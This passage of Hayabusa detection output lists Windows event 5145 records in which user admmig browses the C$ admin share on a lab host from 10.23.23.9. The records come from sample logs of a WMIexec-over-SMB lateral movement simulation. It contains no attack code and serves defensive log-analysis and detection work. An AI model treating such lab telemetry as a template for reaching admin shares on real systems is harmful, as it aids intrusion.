+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:33.636 
